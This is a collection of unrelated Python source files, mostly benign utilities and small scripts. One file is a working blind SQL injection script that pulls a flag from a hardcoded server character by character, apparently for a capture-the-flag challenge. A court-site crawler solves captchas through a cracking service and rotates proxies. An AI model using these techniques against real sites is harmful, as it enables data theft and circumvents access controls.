    sample exceeds ceil(len * fraction) entries, then filters by condition.
    NOTE(review): the loop condition is <=, so one more than ceil(len*fraction)
    combinations are picked; with fraction close to 1 this can spin for a
    long time — confirm intent.
    """
    combos = getOuterProduct2Array(ar)
    target = ceil(len(combos) * fraction)
    chosen = []
    while len(chosen) <= target:
        idx = randint(0, len(combos) - 1)
        if idx not in chosen:
            chosen.append(idx)
    picked = [combos[i] for i in chosen]
    return [c for c in picked if condition(c)]
# given some dictionary with tuple values (parameter combinatorics) the
# cartesian product of their tuple values is build
def getParameterCombinations(PARAMS,**kwargs):
    """Expand a dict of parameter-name -> candidate-values into a list of
    concrete parameter dicts (one per combination).

    Keyword options (with defaults): combinatoric='GridSearch' (also accepts
    names starting with 'Random' or 'NAry'), fraction=0.3 (random sampling),
    'n-ary'=2, condition=filter applied to the final dicts.

    NOTE: PARAMS is mutated in place — None entries are stripped from each
    value list before combining.
    """
    defaultParameter={'combinatoric':'GridSearch','fraction':0.3,'n-ary':2,'condition':lambda x : True}
    defaultParameter.update(kwargs)
    liReturn=[]
    dicComb={}
    iarComb=[]
    combinatorics=[]
    i=0
    # Record, per positional index, the key name and its number of candidates.
    for k in PARAMS.keys():
        PARAMS[k]=[ o for o in PARAMS[k] if o is not None]
        iarComb.append(len(PARAMS[k]))
        dicComb[i]=k
        i+=1
    # Pick the index-combination strategy.
    if defaultParameter['combinatoric'].upper().startswith('RANDOM'):
        combinatorics=getRandomFractionalCombinatoric(iarComb,fraction=defaultParameter['fraction'])
    elif defaultParameter['combinatoric'].upper().startswith('NARY'):
        combinatorics=getNAryOuterProduct2Array(iarComb,n=defaultParameter['n-ary'])
    elif defaultParameter['combinatoric'].upper().startswith('GRID') :
        combinatorics=getOuterProduct2Array(iarComb)
    # Translate each index tuple back into a {name: value} dict.
    for c in combinatorics:
        i=0
        params={}
        for j in c:
            k=dicComb[i]
            params[k]=PARAMS[k][j]
            i+=1
        liReturn.append(params)
    return list(filter(defaultParameter['condition'],liReturn))
# given several parameter dictionaries, the cartesian product of
# their combinatorical cartesian products is build
def getParameterArrayCombinations(PARAMS):
    """Cartesian product of the parameter combinations of several parameter
    dictionaries (see getParameterCombinations).

    Returns a list of merged parameter dicts; later dictionaries override
    earlier ones on key collisions.

    BUG FIXES vs. the original:
    - the three-dictionary branch iterated PARAMS[1] twice instead of
      PARAMS[2];
    - it merged via l1.update(l2.update(l3)): dict.update() returns None,
      so this raised TypeError;
    - l1 was mutated across inner iterations, leaking keys from one
      combination into the next. Merging now starts from a fresh dict per
      combination;
    - any number of dictionaries is supported (the original handled only
      1-3 and implicitly returned None otherwise).
    """
    if not PARAMS:
        return []
    if len(PARAMS) == 1:
        return getParameterCombinations(PARAMS[0])
    liComb = []
    perDict = [getParameterCombinations(p) for p in PARAMS]
    for parts in itertools.product(*perDict):
        merged = {}
        for part in parts:
            merged.update(part)
        liComb.append(merged)
    return liComb
#endregion
#region filtering objects
def filterDictionary(dic,condition=lambda x,y : True):
    """Return a new dict containing only the items for which
    condition(key, value) is true (everything, by default)."""
    kept = {}
    for key, value in dic.items():
        if condition(key, value):
            kept[key] = value
    return kept
#endregion
#region (smooth) minimum
#%%
@tf.custom_gradient
def smoothMinimum(x,gamma=0.1):
    """Soft minimum of x with temperature gamma.

    Forward value: min(x) - gamma * sum(exp((min(x) - x) / gamma)).
    The custom gradient routes dx (negated) uniformly onto the hard argmin
    positions instead of differentiating the smooth expression.
    """
    min=np.min(x)  # NOTE: shadows the builtin `min`
    p=tf.cast((-x+min),tf.float64)/gamma
    def grad(dx,gamma=0.1):
        # NOTE(review): `tf.minimum(x, 10000)[0]` keeps only the first
        # element, and `.numpy()` requires eager execution — confirm this
        # computes the intended minimum value.
        m=tf.minimum(x,10000)[0].numpy()
        minIndex=tf.cast(tf.constant(x==m),tf.float64)
        # Spread -dx evenly over all argmin entries; second return value is
        # the (zero) gradient w.r.t. gamma.
        return tf.multiply(-minIndex,dx/tf.reduce_sum(minIndex)),0
    return tf.Variable(-gamma*np.sum(np.exp(p))+min),grad
def grad_smoothMinimum(x,gamma=0.1):
    """Return d smoothMinimum(x, gamma) / dx via autodiff.

    x must be a TF tensor/Variable; tape.watch makes plain tensors
    differentiable too.
    """
    with tf.GradientTape() as tape:
        tape.watch(x)
        value = smoothMinimum(x,gamma)
    return tape.gradient(value, x)
@tf.custom_gradient
def Minimum(x):
    """Hard minimum of x with a custom gradient.

    NOTE(review): grad returns the scalar 1 regardless of dx or of which
    element was minimal — this looks like a placeholder rather than a real
    gradient; confirm.
    """
    def grad(dx):
        return 1
    return x[tf.argmin(x)],grad
def grad_Minimum(x):
    """Return d Minimum(x) / dx via autodiff (see Minimum's custom grad)."""
    with tf.GradientTape() as tape:
        tape.watch(x)
        value = Minimum(x)
    return tape.gradient(value, x)
#endregion
#region binary encoding
# The function which converts an integer value to the binary value:
def binaryEncode(i):
    """Return integer i as a zero-padded 64-character binary string."""
    return format(i, '064b')
# binary to integer
def binaryDecode(bi):
    """Convert a 64-character binary string (MSB first) back to an integer."""
    value = 0
    for i in range(64):
        if bi[i] == '1':
            value += 1 << (63 - i)
    return value
# combines several digital signal values to one integer value
def encodeSignalValues(sigValues):
    """Pack a sequence of digital signal values (MSB first) into one integer,
    returned inside a one-element list. Any value other than 1 counts as 0."""
    packed = 0
    for bit in sigValues:
        packed = (packed << 1) | (1 if bit == 1 else 0)
    return [packed]
#decodes integer signal value in n digital signal values
def decodeSignalValues(sigValue,n):
    """Unpack integer sigValue into its n digital signal values (MSB first).

    Inverse of encodeSignalValues for n signals.

    BUG FIX: the original condition `i > 64-n` skipped the first of the n
    bits and returned only n-1 values, so the round trip with
    encodeSignalValues lost a signal; `i >= 64-n` keeps all n.
    """
    lb = '{:064b}'.format(sigValue)
    # Take the last n characters of the 64-bit representation.
    return [ord(lb[i]) - 48 for i in range(64) if i >= 64 - n]
# given 2 integer return the difference when readed as composed digital signal values
def binaryIntegerDifference(val1,val2):
    """Hamming distance between two integers read as composed digital
    signal words. List/ndarray arguments are unwrapped to their first
    element before comparing."""
    if isinstance(val1, (list, np.ndarray)):
        val1 = val1[0]
    if isinstance(val2, (list, np.ndarray)):
        val2 = val2[0]
    # Popcount of the XOR = number of differing bit positions.
    return bin(val1 ^ val2).count('1')
#endregion
#region method extensions
# Method Extension via decorator
# Method Extension via decorator
def method_extension(cls):
    """Decorator factory: attach the decorated function to cls as a method
    (named after the function) and return the function unchanged."""
    def register(fn):
        setattr(cls, fn.__name__, fn)
        return fn
    return register
# Method Extension via metaclass
# Method Extension via metaclass
def method_extension_class(name, bases, namespace):
    """Metaclass-style hook that monkey-patches every attribute of a class
    body onto its single base class and returns that base (so the new class
    name becomes an alias of the base).

    BUG FIX: the original iterated namespace.iteritems(), which does not
    exist under Python 3 (this file otherwise uses Python-3-only syntax such
    as super().__init__()); use items(). The loop variable was also renamed
    so it no longer shadows the `name` parameter.
    """
    assert len(bases) == 1, "Exactly one base class required"
    base = bases[0]
    for attr, value in namespace.items():
        if attr != "__metaclass__":
            setattr(base, attr, value)
    return base
# class <newclass>(<someclass>):
# __metaclass__ = monkeypatch_class
# def <method1>(...): ...
# def <method2>(...): ...
# This adds <method1>, <method2>, etc. to <someclass>, and makes
# <newclass> a local alias for <someclass>.
#region list/ dictionary extensions
class List(list):
    """A list with a fluent interface: chainable append (lappend), mapping
    (foreach), and slices that come back as List instances."""
    __metaclass__ = method_extension_class  # Python-2-era hook; inert under Python 3
    def __init__(self, iterable):
        super().__init__(iterable)
    def lappend(self, item):
        """Append item and return self so calls can be chained."""
        self.append(item)
        return self
    def foreach(self, func=lambda a: a):
        """Return a new List holding func applied to every element."""
        return List(map(func, self))
    def __getitem__(self, item):
        """Index like a plain list, but wrap slice results back into a List."""
        picked = list.__getitem__(self, item)
        if isinstance(item, slice):
            return List(picked)
        return picked
# class List(list):
# def __init__(self, iterable):
# super().__init__(iterable)
# @method_extension(List)
# def add(self,a):
# if not a in self:
# self.append(a)
# return self
# @method_extension(List)
# def lappend(self,a):
# self.append(a)
# return self
# @method_extension(List)
# def foreach(self,func=lambda a:a):
# return List([func(a) for a in self])
# @method_extension(List)
# def __getitem__(self,item):
# lc=self.copy()
# return List(lc[item])
class Dict(dict):
    """A dict that stores every value inside a list so repeated adds for the
    same key accumulate instead of overwriting."""
    __metaclass__ = method_extension_class  # Python-2-era hook; inert under Python 3
    def __init__(self, dic):
        # Wrap each initial value in a singleton list.
        for key, value in dic.items():
            self[key] = [value]
    def __add(self, k, v):
        """Append v to the bucket for k, creating the bucket if missing."""
        bucket = self.get(k)
        if bucket is None:
            self[k] = [v]
        else:
            bucket.append(v)
    def add(self, dic):
        """Merge dic into self, accumulating values per key."""
        for key, value in dic.items():
            self.__add(key, value)
#endregion
#endregion
#region experiments and tests
# #%%
# li=List([1,2,3,6,7,8,9])
# li1=li.lappend(4)
# isinstance(li1,List)
# print(li1)
# f=lambda l:List([l]).lappend(35)
# l2=li1.foreach(f)
# isinstance(l2,List)
# lis=List(li)
# print(lis.foreach(lambda a:2*a))
# l3=li[2:3]
# print(l3)
# dic={'a':1,'b':2}
# dic1=Dict({})
# dic1.add({'a':3})
# print(dic1)
# print(getNAryOuterProduct2Array([3,4,2,2]))
# # %%
# l=[13,25,2233,43628]
# for i in l:
# print(i)
# print(binaryEncode(i))
# print(binaryDecode(binaryEncode(i)))
# # %%
# l1=[1,1,0,0,0,1]
# l2=[0,1,0,0,1,1]
# d1=encodeSignalValues(l1)
# d2=encodeSignalValues(l2)
# print(d1)
# # print(d2)
# #%%
# dar=[2.0,4.0,2.0]
# p=np.array(dar)
# min=np.min(dar)
# min=(p==min).astype(int)
# print(np.sum(min))
# #%% # return -gamma * (log(tmp) + max_val)
# x=np.array(dar)
# print(smoothMinimum(x))
# print(grad_smoothMinimum(tf.Variable(x)))
# print(Minimum(x))
# print(grad_Minimum(tf.Variable(x)))
# #%%
# ind=np.array([1, 0, 0])
# p=np.array(dar)
# print(p*ind)
#endregion
# # %%
# import random
# ar=[]
# for i in range(1000):
# ar.append(random.randint(1,10000)*1.0)
# min1=min(ar)
# print(ar[tf.argmin(ar)])
# print(abs(min1))
# #%%
# print(Minimum(tf.Variable(ar)))
# print(grad_Minimum(tf.Variable(ar)))
# # print(grad_smoothMinimum(tf.Variable(ar)))
# #%%
|
'''
FizzBuzz challenge:
- For multiples of 3 print "Fizz"
- for multiples of 5 print "Buzz"
- If the number is a multiple of 3 and 5 print "FizzBuzz"
'''
class FizzBuzz:
    """Classic FizzBuzz printer (see the module docstring for the rules)."""
    def fizz_buzz(self, num):
        """Print FizzBuzz/Fizz/Buzz for num; prints nothing when num is
        divisible by neither 3 nor 5.

        BUG FIX: the original first branch was `num % 3 and num % 5 == 0`,
        which is false for every multiple of 3 (num % 3 == 0 is falsy), so
        fizz_buzz(15) printed "Fizz" instead of "FizzBuzz".
        """
        if num % 3 == 0 and num % 5 == 0:
            print("FizzBuzz")
        elif num % 3 == 0:
            print("Fizz")
        elif num % 5 == 0:
            print("Buzz")
# Demo: exercise the Fizz, Buzz, and FizzBuzz branches.
fb = FizzBuzz()
fb.fizz_buzz(3)
fb.fizz_buzz(5)
fb.fizz_buzz(15)
|
# -*- coding:utf-8 -*-
__author__ = 'angelwhu'
import binascii
import requests
import sys
session = requests.Session()
def test(input):
    """Send one boolean blind-SQL-injection probe (Python 2 script).

    The injected expression lands in the ORDER BY position: ordering by
    `name` vs `price` changes which row id appears first, so the first ~35
    characters of the response reveal the truth value of `input`.
    Returns True when the injected condition evaluated true.
    """
    url = "http://202.120.7.197/app.php?action=search&keyword=&order=if(" + input + ",name,price)"
    print url
    headers = {"Accept-Encoding": "gzip, deflate",
               "Accept-Language": "en-US,en;q=0.5",
               "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0",
               "cookie":"PHPSESSID=0k3dt4k70kkabuha8s50hsnb83",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "keep-alive"}
    response = session.get(url, headers=headers)
    #print response.text
    return ("\"id\":\"3\"" in response.text[:35])
def brute_force_expr(expr):
    """Recover a SQL query result one character at a time via blind injection.

    For each character position, tries every ASCII code from 40 ('(') to
    126 ('~') with a boolean probe (see test); stops at the first position
    where no code matches.
    NOTE(review): the active payload queries the flag table directly and
    only the commented-out variant uses the expr argument — confirm.
    """
    ch_i=1
    ascii_i=40 #(
    word = ""
    while True:
        found_char=False
        while(ascii_i<=126): #~
            #res = test("ascii(substring(("+expr+"),"+str(ch_i)+",1))="+str(ascii_i))
            #test_char = "0x"+binascii.hexlify(chr(ascii_i))
            #ascii(substring((select(select(flag)from(ce63e444b0d049e9c899c9a0336b3c59))),str(ch_i),1))like(test_char)
            payload = "ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),"+str(ch_i)+",1))like("+str(ascii_i)+")"
            #print payload
            res = test(payload)
            if(res):
                word += chr(ascii_i)
                print "Found (",ch_i,") ",chr(ascii_i)," - ",word
                found_char = True
                break
            ascii_i+=1
        if(not found_char):
            print "No char at index ",ch_i," .. ending string construction.."
            break
        # Reset the ASCII scan for the next character position.
        ascii_i = 40
        ch_i+=1
    return word
print brute_force_expr(sys.argv[1]) #Replacement fix the spaces problem!
|
#!/usr/bin/python
from PageRankIter_W import PageRankIter_W
from PageRankDist_W import PageRankDist_W
from PageRankSort_W import PageRankSort_W
from helper import getCounter, getCounters
from subprocess import call, check_output
from time import time
import sys, getopt, datetime, os
# parse parameter
if __name__ == "__main__":
    # Parse command-line options: -g graph path, -j jump (teleport)
    # probability, -i number of PageRank iterations (Python 2 script).
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hg:j:i:")
    except getopt.GetoptError:
        print 'RunBFS.py -g <graph> -j <jump> -i <iteration> -d <index> -s <size>'
        sys.exit(2)
    if len(opts) != 3:
        print 'RunBFS.py -g <graph> -j <jump> -i <iteration> -d <index>'
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print 'RunBFS.py -g <graph> -j <jump> -i <iteration> -d <index>'
            sys.exit(2)
        elif opt == '-g':
            graph = arg
        elif opt == '-j':
            jump = arg
        elif opt == '-i':
            n_iter = arg
    start = time()
    FNULL = open(os.devnull, 'w')  # sink for noisy hdfs command output
    n_iter = int(n_iter)
    host = 'localhost'
    print '%s: %s topic sensitive PageRanking on \'%s\' for %d iterations with damping factor %.2f ...' %(str(datetime.datetime.now()),
        'start', graph[graph.rfind('/')+1:], n_iter, 1-float(jump))
    # clear directory
    print str(datetime.datetime.now()) + ': clearing directory ...'
    call(['hdfs', 'dfs', '-rm', '-r', '/user/leiyang/in'], stdout=FNULL)
    call(['hdfs', 'dfs', '-rm', '-r', '/user/leiyang/out'], stdout=FNULL)
    call(['hdfs', 'dfs', '-cp', '/user/leiyang/wiki_topic', '/user/leiyang/in'])
    # create iteration job
    iter_job = PageRankIter_W(args=['hdfs:///user/leiyang/in/part*', '--n', '10',
        '-r', 'hadoop', '--output-dir', 'hdfs:///user/leiyang/out'])
    # run pageRank iteratively
    iteration = 1
    while(1):
        print str(datetime.datetime.now()) + ': running iteration %d ...' %iteration
        with iter_job.make_runner() as runner:
            runner.run()
        # check counters for topic loss mass
        loss = getCounters('wiki_dangling_mass', host)
        # One slot per topic (10 topics + overall); counters are scaled by 1e10.
        loss_array = ['0']*11
        for k in loss:
            i = int(k.split('_')[1])
            loss_array[i] = str(loss[k]/1e10)
        # move results for next iteration
        call(['hdfs', 'dfs', '-rm', '-r', '/user/leiyang/in'], stdout=FNULL)
        call(['hdfs', 'dfs', '-mv', '/user/leiyang/out', '/user/leiyang/in'])
        # run redistribution job (spread dangling-node mass back over topics)
        loss_param = '[%s]' %(','.join(['0']*11) if len(loss)==0 else ','.join(loss_array))
        dist_job = PageRankDist_W(args=['hdfs:///user/leiyang/in/part*', '--m', loss_param,
            '-r', 'hadoop', '--output-dir', 'hdfs:///user/leiyang/out'])
        print str(datetime.datetime.now()) + ': distributing loss mass ...'
        with dist_job.make_runner() as runner:
            runner.run()
        if iteration == n_iter:
            break
        # if more iteration needed
        iteration += 1
        call(['hdfs', 'dfs', '-rm', '-r', '/user/leiyang/in'], stdout=FNULL)
        call(['hdfs', 'dfs', '-mv', '/user/leiyang/out', '/user/leiyang/in'], stdout=FNULL)
    # run sort job
    print str(datetime.datetime.now()) + ': sorting PageRank ...'
    call(['hdfs', 'dfs', '-rm', '-r', '/user/leiyang/rank'], stdout=FNULL)
    sort_job = PageRankSort_W(args=['hdfs:///user/leiyang/out/part*',
        '-r', 'hadoop', '--output-dir', 'hdfs:///user/leiyang/rank'])
    with sort_job.make_runner() as runner:
        runner.run()
    print "%s: PageRank job completes in %.1f minutes!\n" %(str(datetime.datetime.now()), (time()-start)/60.0)
    call(['hdfs', 'dfs', '-cat', '/user/leiyang/rank/p*'])
|
from django.core.cache import cache
from rest_framework import serializers
from thenewboston.constants.network import BALANCE_LOCK_LENGTH, VERIFY_KEY_LENGTH
from thenewboston.serializers.network_block import NetworkBlockSerializer
from v1.cache_tools.cache_keys import CONFIRMATION_BLOCK_QUEUE
from v1.tasks.confirmation_block_queue import process_confirmation_block_queue
class UpdatedBalanceSerializer(serializers.Serializer):
    """Validates one account balance change inside a confirmation block:
    account number, new balance, and (for the sender only) a balance lock."""
    account_number = serializers.CharField(max_length=VERIFY_KEY_LENGTH)
    balance = serializers.DecimalField(max_digits=32, decimal_places=16)
    balance_lock = serializers.CharField(max_length=BALANCE_LOCK_LENGTH, required=False)
    def create(self, validated_data):
        """Creation is not supported; this serializer is validation-only."""
        pass
    def update(self, instance, validated_data):
        """Updates are not supported; this serializer is validation-only."""
        pass
class ConfirmationBlockSerializerCreate(serializers.Serializer):
    """Validates an incoming confirmation block and enqueues it (via the
    cache-backed queue) for asynchronous processing."""
    block = NetworkBlockSerializer()
    block_identifier = serializers.CharField(max_length=VERIFY_KEY_LENGTH)
    updated_balances = UpdatedBalanceSerializer(many=True)
    def create(self, validated_data):
        """
        Add a confirmation block to the queue
        """
        # NOTE(review): get/append/set on the shared cache key is not atomic;
        # concurrent creates could drop a block — confirm acceptable.
        initial_data = self.initial_data
        queue = cache.get(CONFIRMATION_BLOCK_QUEUE)
        if queue:
            queue.append(initial_data)
        else:
            queue = [initial_data]
        cache.set(CONFIRMATION_BLOCK_QUEUE, queue, None)
        process_confirmation_block_queue.delay()
        return validated_data
    def update(self, instance, validated_data):
        """Updating queued confirmation blocks is not supported."""
        pass
    def validate(self, data):
        """
        Check that confirmation block is unique (based on block_identifier)
        """
        block_identifier = data['block_identifier']
        confirmation_block_queue = cache.get(CONFIRMATION_BLOCK_QUEUE)
        if confirmation_block_queue:
            # Simplified: the original built a generator whose filter never
            # referenced the loop variable; a direct membership test has the
            # same outcome and states the intent clearly.
            existing_block_identifiers = {i['block_identifier'] for i in confirmation_block_queue}
            if block_identifier in existing_block_identifiers:
                raise serializers.ValidationError('Confirmation block with that block_identifier already exists')
        return data
    @staticmethod
    def validate_updated_balances(updated_balances):
        """
        Verify that only 1 updated balance includes a balance_lock (the sender)
        """
        # Account numbers must be unique within one confirmation block.
        account_numbers = {i['account_number'] for i in updated_balances}
        if len(account_numbers) != len(updated_balances):
            raise serializers.ValidationError(
                'Length of unique account numbers should match length of updated_balances'
            )
        balance_locks = [i['balance_lock'] for i in updated_balances if i.get('balance_lock')]
        if len(balance_locks) != 1:
            raise serializers.ValidationError('Should only contain 1 balance lock')
        return updated_balances
|
from rest_framework import serializers
from .. import models
class ResourcesSerializer(serializers.ModelSerializer):
    """Serializes a Resources model instance, exposing only the money and
    hydrocarbon fields."""
    class Meta:
        model = models.Resources
        fields = ('money',
                  'hydrocarbon')
'hydrocarbon') |
# Longest Collatz sequence
'''
The following iterative sequence is defined for the set of positive integers:
n → n/2 (n is even)
n → 3n + 1 (n is odd)
Using the rule above and starting with 13, we generate the following sequence:
13 → 40 → 20 → 10 → 5 → 16 → 8 → 4 → 2 → 1
It can be seen that this sequence (starting at 13 and finishing at 1) contains 10 terms.
Although it has not been proved yet (Collatz Problem), it is thought that all starting numbers finish at 1.
Which starting number, under one million, produces the longest chain?
Note: Once the chain starts the terms are allowed to go above one million.
'''
# Answer = 837799
# Scan every starting number below one million and keep the one whose
# Collatz chain is longest.
longest = 1  # best starting number found so far
length = 1   # its chain length
x = 1
while x < 1000000:
    n = x
    collatz = 1  # the chain includes the starting term itself
    while n != 1:
        if n % 2 == 0:
            # BUG FIX: was `n /= 2`, which turns n into a float under
            # Python 3 (this file uses print()); floor division keeps the
            # arithmetic exact integer math.
            n //= 2
        else:
            n = 3*n + 1
        collatz += 1
    if collatz > length:
        length = collatz
        longest = x
    x += 1
print(longest)
import tweepy
import time
from tweepy import OAuthHandler
from tweepy import Stream
from tweepy.streaming import StreamListener
import json
from http.client import IncompleteRead
import csv
# Twitter API credentials — placeholders; must be filled in before running.
consumer_key = None
consumer_secret = None
access_token = None
access_secret = None
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_secret)
api = tweepy.API(auth, timeout=90)
# NOTE(review): this csv writer is created but never used below — the stream
# handler writes to UTWriter.txt instead; confirm result.csv output is wanted.
with open('result.csv', 'a') as csvdump:
    wTweet = csv.writer(csvdump, delimiter=';')
class Listener(StreamListener):
    """Stream handler that echoes English-language tweets to stdout and
    appends their text to UTWriter.txt."""
    def on_status(self, status):
        # Keep only tweets tagged as English.
        if status.lang == 'en':
            print(status.text)
            with open("UTWriter.txt", "a", encoding='utf-8') as writer:
                writer.write(status.text + "\n")
    #def on_error(self, status):
    # print(status)
    # return True
# Keep the sample stream alive: long-lived streams raise IncompleteRead,
# so reconnect silently; stop cleanly on Ctrl-C.
while True:
    try:
        twitter_stream = Stream(auth, Listener())
        twitter_stream.sample()
    except IncompleteRead:
        pass
    except KeyboardInterrupt:
        twitter_stream.disconnect()
        break
    #finally: # Is this ok, may result in rate limiting?
    # pass
def record_data(input):
    """Write every line from *input* to the file ``record_data``.

    BUG FIX: the original re-opened the file in "w" mode inside the loop,
    truncating it on every line so only the last line survived. The file is
    now opened once (and closed deterministically via the context manager).
    """
    with open("record_data", "w") as log:
        for line in input:
            log.write(line)
|
import matplotlib.pyplot as plt
import seaborn as sns
def plot_bar(data, x, y, title, label_x_axis='', label_y_axis='', with_annotation=True, save_as=''):
    """Draw a vertical seaborn bar chart of data[y] grouped by data[x].

    Optionally annotates each bar with its (integer-formatted) height and,
    when save_as is non-empty, writes the figure to that path.
    """
    sns.set_style('whitegrid')
    figure, axis = plt.subplots(figsize=(10, 6))
    # NOTE: barplot draws on the current axes; the handle is rebound here
    # just as in the original implementation.
    axis = sns.barplot(x=x, y=y, data=data, ci=None, palette='muted', orient='v', )
    axis.set_title(title, fontsize=18)
    axis.set_xlabel(label_x_axis)
    axis.set_ylabel(label_y_axis)
    if with_annotation:
        for patch in axis.patches:
            height_label = format(patch.get_height(), '.0f')
            anchor = (patch.get_x() + patch.get_width() / 2., patch.get_height())
            axis.annotate(height_label, anchor, ha='center', va='center',
                          xytext=(0, 5), textcoords='offset points')
    if save_as != '':
        figure.savefig(save_as)
# tuple data structure
# tuples can store any data type
# most important: tuples are immutable — they can't be changed once created
# example = ('one','two','three')
# # no append, no insert , no pop, no remove
# For better practice, should be used only if we know, data is not going to change
# Why to use tuples:
# faster than lists
# Methods
# count, index
# len function
# slicing
|
from collections import Counter
def calculate_gc_content(sequence):
    """
    Receives a DNA sequence (A, G, C, or T)
    Returns the percentage of GC content (rounded to the last two digits)
    """
    counts = Counter(sequence.lower())
    gc = counts['g'] + counts['c']
    # Denominator counts only the four canonical bases, as before.
    total = gc + counts['a'] + counts['t']
    return round(gc / total * 100, 2)
pass |
import random
from prefect.utilities.annotations import unmapped
class TestUnmapped:
    """Tests for prefect.utilities.annotations.unmapped."""
    def test_always_returns_same_value(self):
        # unmapped wraps a constant: indexing at any position must yield
        # the wrapped value unchanged.
        thing = unmapped("hello")
        for _ in range(10):
            assert thing[random.randint(0, 100)] == "hello"
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@copyright: icekredit Tech, LTD
file_name:guang_dong_fa_yuan_wang.py
description: 广东法院网
author:crazy_jacky
version: 1.0
date:2018/9/19
"""
import re
import time
import json
import traceback
from lxml import etree
from ics.utils import get_ics_logger
from ics.utils.exception_util import LogicException
from ics.crawler.ktgg.core.constant import TASK_STATUS
from ics.captcha.chaojiying.crack_captch import CjyCaptcha
from ics.crawler.ktgg.core.iter_page_base import KtggIterPageBase
from ics.http.http_downloader import Downloader, HEADERS_MODEL, PROXY_STRATEGY
class GuangDongFaYuanWang(KtggIterPageBase):
    """
    Crawler for hearing announcements on the Guangdong Court Network
    (广东法院网). Python 2 code: fetches the paginated AJAX search results
    (captcha + CSRF token per page), then each case's detail page, and
    persists the parsed fields via the ktgg tooling.
    """
    domain = 'www.gdcourts.gov.cn'
    ename = 'guang_dong_fa_yuan_wang'
    cname = u'广东法院网'
    developer = u'郑淇鹏'
    # Headers for the AJAX search endpoint.
    header = {'Accept': 'application/json,text/javascript,*/*;q=0.01',
              'Accept-Encoding': 'gzip,deflate',
              'Accept-Language': 'zh-CN,zh;q=0.9',
              'Connection': 'keep-alive',
              'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
              'Host': 'www.gdcourts.gov.cn',
              'Origin': 'http://www.gdcourts.gov.cn',
              'Referer': 'http://www.gdcourts.gov.cn/web/search?action=gotoajxxcx&ajlx=sp&flag=first',
              'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36('
                            'KHTML,likeGecko)Chrome/69.0.3497.100Safari/537.36',
              'X-Requested-With': 'XMLHttpRequest'}
    start_url = 'http://www.gdcourts.gov.cn/web/search?action=gotoajxxcx&ajlx=sp&flag=first'
    # POST form template; token/captcha fields are refreshed per page by
    # update_form_data.
    form_data = {"ajlx": "sp",
                 "fjm": "J00",
                 "pageNum": '',
                 "dsr": "",
                 "ah": "",
                 "csToken": '',
                 "page_randomcode": '',
                 "page_randomcode_submit": ''
                 }
    def __init__(self, logger, seed_dict):
        self.logger = logger or get_ics_logger(self.ename)
        self.seed_dict = seed_dict
        self.status = None
        # Third-party captcha-cracking client.
        self.captcha = CjyCaptcha(self.logger)
        self.downloader = Downloader(
            logger=self.logger,
            use_proxy=True,
            proxy_mode='dly',
            session_keep=True,
            headers_mode=HEADERS_MODEL.OVERRIDE,
            proxy_strategy=PROXY_STRATEGY.SWITCH_USE,
        )
        super(GuangDongFaYuanWang, self).__init__(self.seed_dict, self.logger)
    def get_total_page(self):
        """Fetch the landing page and return the total result-page count.

        Also stashes the page's token under form_data['token_key'] for the
        token exchange performed later in update_form_data.
        Raises LogicException on any download/parse failure.
        """
        try:
            header = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
                      'Accept-Encoding': 'gzip,deflate',
                      'Accept-Language': 'zh-CN,zh;q=0.9',
                      'Connection': 'keep-alive',
                      'Host': 'www.gdcourts.gov.cn',
                      'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36('
                                    'KHTML,likeGecko)Chrome/69.0.3497.100Safari/537.36',
                      'Upgrade-Insecure-Requests': '1',
                      }
            resp = self.downloader.get(self.start_url, headers=header)
            if not resp:
                err_msg = u'下载列表页码resp为False'
                self.logger.warning(err_msg)
                raise LogicException(err_msg)
            # Total page count and anti-CSRF token are embedded in the HTML.
            page_cnt = re.findall('"bsumpage">(\d+)<', resp.content, flags=re.S)
            token_key = re.findall('{"tokenKey":"(\d+)"}', resp.content, flags=re.S)
            if not page_cnt:
                err_msg = u'下载列表页获取到的页面,提取不到总页码,请检查列表页html是否正确'
                self.logger.warning(err_msg + ':{}'.format(resp.text))
                raise LogicException(err_msg)
            self.form_data.update({'token_key': token_key[0]})
            return int(page_cnt[0])
        except Exception:
            err_msg = u'下载列表页码失败:{}'.format(traceback.format_exc())
            self.logger.error(err_msg)
            raise LogicException(err_msg)
    def update_form_data(self, page):
        """Refresh captcha code + CSRF token and fill form_data for `page`.

        Raises LogicException on failure.
        """
        try:
            # Timestamp doubles as the captcha-image id and submit marker.
            timespan = str(time.time()).replace('.', '')
            url = 'http://www.gdcourts.gov.cn/common/random_codeById/{}-'.format(timespan)
            header = {'Accept': 'image/webp,image/apng,image/*,*/*;q=0.8',
                      'Accept-Encoding': 'gzip,deflate',
                      'Accept-Language': 'zh-CN,zh;q=0.9',
                      'Connection': 'keep-alive',
                      'Host': 'www.gdcourts.gov.cn',
                      'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36('
                                    'KHTML,likeGecko)Chrome/69.0.3497.100Safari/537.36',
                      'Referer': 'http://www.gdcourts.gov.cn/web/search?action=gotoajxxcx&ajlx=sp&flag=first',
                      }
            pic_cont = self.downloader.get(url, headers=header)
            # Solve the captcha image via the external cracking service.
            code, report_id = self.captcha.crack_captcha(pic_cont.content, yzm_dir='gdcourts')
            url = 'http://www.gdcourts.gov.cn/common/getToKenTempPutCk'
            form_data = {'tokenKey': self.form_data['token_key']}
            token_cont = self.downloader.post(url, data=form_data, headers=self.header)
            token = token_cont.json().get('tokenVal')
            self.form_data.update({
                "pageNum": page,
                "csToken": token,
                "page_randomcode": code,
                "page_randomcode_submit": timespan
            })
        except Exception:
            err_msg = u'更新form_data失败:{}'.format(traceback.format_exc())
            self.logger.error(err_msg)
            raise LogicException(err_msg)
    def iter_page_list(self, total_page):
        """Walk every result page and crawl each listed case's detail page."""
        if total_page == 0:
            self.logger.info(u'总页码为 total_page: {}, 无此记录'.format(total_page))
